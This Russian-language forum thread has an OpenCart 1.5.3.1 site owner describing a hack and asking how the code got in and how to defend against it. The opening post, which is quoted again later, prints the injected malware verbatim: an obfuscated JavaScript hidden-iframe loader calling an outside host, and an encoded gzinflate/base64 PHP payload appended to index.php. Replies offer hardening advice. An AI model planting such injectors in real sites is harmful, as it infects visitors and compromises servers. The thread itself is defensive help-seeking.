Взлом сайта на opencart 1.5.3.1

[newPlayer]

Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id=\'Twitter\'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

[costas]

Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
	_n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id='Twitter'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

Задайте этот вопрос службе поддержке Вашего хостинга, причин может быть несколько:

- слишком простые пароли доступа к хостингу (обычно подбирают FTP пароль)

- шаред-хостинг со всеми вытекающими последствиями

Мало вероятно, что взлом был через движок магазина (если только Вы не использовали шаблон/модуль скаченный непонятно где), за OpenCart замечено не было, если б было то уже раструбили бы на всех углах.

[newPlayer]

Спасибо за совет. Сменил ключ шифрования - не помогло (атака через 2 дня повторилась). Сейчас поменял пароль к фтп, залил .htaccess в папку "download".

Скажите, а каким вообще образом добавляется код в файл index.php? Из модулей (помимо поиска на яксе) я еще ставил новости (скачивал вроде с =^_^=) - каким образом взламывают через модули? И может ли это быть действием вируса?

[RGB]

=^_^= был неоднократно замечен в распространении шаблонов со скрытыми ссылками на себя, может вы оттуда подцепили какую-то гадость? У меня этот ресурс никогда не вызывал доверия.

[newPlayer]

RGB

И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.

[costas]

RGB

И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.

А где хостинг то? Кто хостер?

[newPlayer]

А где хостинг то? Кто хостер?

http://hoster.by/

[pro1d]

Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

[newPlayer]

Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

Думаю так и сделать. А что такое шелл?

[pro1d]

Файл с таким же шифрованным кодом.

[vikingshop]

http://www.securitylab.ru/vulnerability/422889.php

Кто что думает?

Там даже ссылка на эксплоит есть...

[RGB]

http://forum.opencart.com/viewtopic.php?f=20&t=71244&p=316437

[Гість brk]

http://www.securityl...lity/422889.php

Кто что думает?

Там даже ссылка на эксплоит есть...

Только *nix , никаких win

[vitmihailov]

По поводу безопасности много написали на форуме ОК.

1. использовать антивирус и фаервол на компе.

2. безопасное соединение с фтп (sftp)

3. на самом сервере переименовать папку admin в другую, напримен my_adm1n

4. снять расширение с .htaccess.txt и заменить (или добавить) имеющийся. там уже от ОК прописаны вещи, необходимые для безопасности.

5. самый уязвимый момент для ОК - вход в админку, когда пароль передается в открытом виде. если вас прослушивают между серваком и компом - не поможет вирь и фаер, пакеты перехватываются.

тут только можно добавить головной боли хацкерам - использовать в апаче инструмент htdigest с дополнительной директивой, которая устанавливает временное ограничение на работу времени аутентификации. не панацея, ибо не SSL/TSL. но если по карману сертификат - лечше всего с ним дружить.